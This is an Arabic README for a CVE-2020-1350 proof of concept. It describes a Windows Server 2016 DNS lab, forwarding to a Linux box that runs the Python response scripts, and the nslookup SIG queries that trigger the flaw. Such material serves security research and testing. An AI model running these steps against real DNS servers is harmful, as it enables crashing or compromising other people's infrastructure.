CVE-2020-1350
CVE-2020-1350 إثبات المفهوم
إعداد البيئة
- تنزيل Windows Server 2016
- تنزيل جهاز Linux (جهاز ثانوي لتشغيل هذا السكريبت)
- تثبيت Active Directory/DNS على Windows Server 2016 (لنفترض أنك سميت نطاقك الشرعي
33y0re.com)
- لا يوجد سجلات DNS على خادم Windows 2016 (بعد)
- إنشاء سجل "forwarder" على صورة Windows Server 2016 بعنوان IP الخاص بجهاز Linux
الاستخدام
- اختر نطاقك (النطاق "المهاجم")
- احسب طوله (مثلاً
blah طوله 0x4 بايت و .net طوله 0x3 بايت)
- اضبط
domain_correct على \x04blah\03net\x00
- شغّل
python UDP_Response.py و python TCP_Response.py
- شغّل من صورة Windows Server 2016 أو جهاز Linux:
nslookup -type=sig 33y0re.com ACTIVE_DIRECTORY_DNS_SERVER_IP متبوعاً بـ: nslookup -type=sig 9.MALICIOUS_DOMAIN_FROM_LINUX_BOX_SCRIPT ACTIVE_DIRECTORY_DNS_SERVER_IP